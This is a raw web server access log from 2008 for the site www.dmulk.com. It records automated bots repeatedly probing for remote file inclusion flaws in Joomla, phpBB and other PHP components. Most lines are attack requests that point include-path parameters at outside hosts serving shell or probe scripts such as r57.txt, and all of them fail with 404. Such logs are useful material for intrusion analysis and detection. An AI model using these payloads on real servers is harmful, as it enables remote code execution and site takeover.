213.198.89.199 - - [26/Feb/2008:12:16:48 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:17:13 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:17:13 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:17:14 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:17:14 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:17:34 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:17:34 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:17:35 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:17:36 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:17:53 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:38 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:39 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:39 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:41 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:42 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:43 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:12:18:54 -0800] "GET //codebb/lang_select?phpbb_root_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:18:56 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:19:00 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:19:27 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:19:27 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:19:27 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:21:25 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:22:11 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:22:12 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:22:12 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:22:13 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:22:13 -0800] "GET /logs/access.log/!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:22:13 -0800] "GET /logs/access.log/!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:22:13 -0800] "GET /logs/!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:22:13 -0800] "GET /logs/!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:22:13 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:22:14 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:22:16 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:22:17 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:22:18 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.11 - - [26/Feb/2008:12:23:18 -0800] "GET /logs/access_070821.log HTTP/1.0" 200 64221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.46.247 - - [26/Feb/2008:12:23:29 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:23:34 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:23:34 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:23:35 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:23:45 -0800] "GET /logs/access_080120.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.179.98 - - [26/Feb/2008:12:23:57 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:24:26 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:24:32 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:24:32 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:24:33 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:24:33 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:24:33 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:24:33 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.46.247 - - [26/Feb/2008:12:24:57 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:25:23 -0800] "GET /logs/access_080105.log//modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:25:27 -0800] "GET /logs/access_080131.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:25:28 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:25:28 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:12:25:35 -0800] "GET /logs/access_071116.log//main.php?p=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:12:25:35 -0800] "GET /logs//main.php?p=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:12:25:39 -0800] "GET //config.inc.php?path_escape=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:12:25:41 -0800] "GET /logs//config.inc.php?path_escape=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:25:50 -0800] "GET /logs/access_080211.log/!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:25:50 -0800] "GET /logs/access_080211.log/!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:26:01 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:26:02 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:26:03 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:26:21 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:26:22 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:26:22 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:26:38 -0800] "GET /logs/access_080118.log/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:26:38 -0800] "GET /logs/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:27:15 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.142.139.189 - - [26/Feb/2008:12:27:15 -0800] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:27:15 -0800] "GET //skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:27:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:27:50 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:27:50 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:27:51 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:27:52 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:12:28:19 -0800] "GET /logs/access_080130.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:28:19 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:28:23 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.116.84 - - [26/Feb/2008:12:28:37 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:28:42 -0800] "GET /logs/access_071230.log/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.19.33.141 - - [26/Feb/2008:12:28:58 -0800] "GET /classes/core/language.php?rootdir=http://www.roxowner.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.15.85 - - [26/Feb/2008:12:29:11 -0800] "GET /logs/access_080107.log/index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.15.85 - - [26/Feb/2008:12:29:11 -0800] "GET /logs/index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:12:29:28 -0800] "GET /logs/access_071224.log//main.php?p=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:12:29:43 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:29:44 -0800] "GET /logs/access_080119.log/!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:29:44 -0800] "GET /logs/access_080119.log/!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:12:29:46 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.195.44.108 - - [26/Feb/2008:12:29:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.72 - - [26/Feb/2008:12:30:01 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.194.71.79 - - [26/Feb/2008:12:30:15 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.96 - - [26/Feb/2008:12:31:37 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:12:31:43 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.133.114 - - [26/Feb/2008:12:31:51 -0800] "GET /logs/vwar//convert/mvcw.php?step=1&vwar_root=http://www.spree-boom.de/html/.../contrB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.106.133.114 - - [26/Feb/2008:12:31:51 -0800] "GET /vwar//convert/mvcw.php?step=1&vwar_root=http://www.spree-boom.de/html/.../contrB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.89.114 - - [26/Feb/2008:12:32:00 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.29.89.114 - - [26/Feb/2008:12:32:01 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:32:06 -0800] "GET /logs/access_080107.log/index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:32:06 -0800] "GET /logs/index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:12:32:15 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:32:22 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.77.182.148 - - [26/Feb/2008:12:32:25 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:32:25 -0800] "GET /admin/index.php?o=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:32:25 -0800] "GET /admin/index.php?o=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.94 - - [26/Feb/2008:12:32:26 -0800] "GET /logs/access.log HTTP/1.0" 200 472211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:32:26 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.77.182.148 - - [26/Feb/2008:12:32:27 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:32:27 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:32:48 -0800] "GET /logs/access_080201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.73.27 - - [26/Feb/2008:12:32:52 -0800] "GET /logs/access_080201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.77.182.148 - - [26/Feb/2008:12:35:08 -0800] "GET //config.inc.php?path_escape=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
222.77.182.148 - - [26/Feb/2008:12:35:10 -0800] "GET /logs//config.inc.php?path_escape=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:35:24 -0800] "GET /logs/access_080120.log/myevent.php?myevent_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
